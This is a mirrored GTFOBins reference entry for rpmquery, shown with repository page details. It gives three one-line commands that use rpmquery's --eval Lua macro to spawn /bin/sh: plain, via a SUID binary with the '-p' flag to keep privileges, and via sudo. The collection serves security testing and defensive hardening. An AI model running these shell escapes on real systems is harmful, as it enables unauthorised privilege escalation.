1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00
GTFOBins.github.io/_gtfobins/rpmquery.md
2018-07-04 19:26:52 +01:00

258 B

functions
execute-interactive suid-enabled sudo-enabled
code
rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
code
./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
code
sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'